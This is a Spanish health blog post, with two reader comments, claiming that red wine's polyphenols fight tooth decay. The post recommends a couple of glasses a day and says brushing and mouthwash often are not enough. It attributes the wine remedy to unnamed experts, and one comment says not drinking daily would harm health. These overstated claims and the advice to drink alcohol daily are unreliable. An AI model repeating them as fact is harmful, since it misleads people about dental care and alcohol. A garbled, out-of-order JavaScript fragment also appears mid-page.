Salud y belleza » Salud, Salud dental

El vino ayuda a combatir la caries

2 Comentarios

Beber vino tinto conlleva numerosos efectos positivos para la salud de los que ya hemos hablado en diversas ocasiones: libera endorfinas, previene las enfermedades cardiovasculares, aumenta los niveles de colesterol bueno… Pero hoy vamos a hablar de un efecto positivo menos conocido del vino para tu salud dental: el vino tinto es bueno contra la caries.

vino-tinto-caries

Los polifenoles que contiene esta bebida ayudan a desacelerar el crecimiento de la flora bacteriana que aparece en dientes y encías. Por tanto, un par de copas de vino tinto al día ayudarían a luchar contra las bacterias bucales que causan la caries.

El motivo de este beneficio para tu salud dental se basa en que el vino tinto cuenta con polifenoles, antioxidantes naturales que te ayudan a prevenir la caries y mantienen tu boca libre de bacterias.

Las enfermedades de encías, pérdida de dientes y caries son problemas bucales que afecta a entre un 60 y un 90% de la población mundial. Todos esos problemas son causados por bacterias que se reúnen en la boca formando biopelículas que cuesta matar y acaban formando una placa que daña los dientes.

vino-prevenir-caries

Con el cepillado y el enjuague bucal a menudo no basta, por lo que muchos expertos están empezando a considerar el vino tinto como un remedio natural para prevenir la caries y mejorar la salud dental.

¿Crees que sería bueno beber vino para prevenir la caries?

d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

2 Comments »

  • diana said:

    aaaaa, por eso tengo la dentadura tan sana… ya decía yo… y no me creían algunos jajaja.

  • daniela said:

    Yo creo que deberíamos tomar una copa de vino al día, porque tiene tantos beneficios que no tomarla sería perjudicial para la salud.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.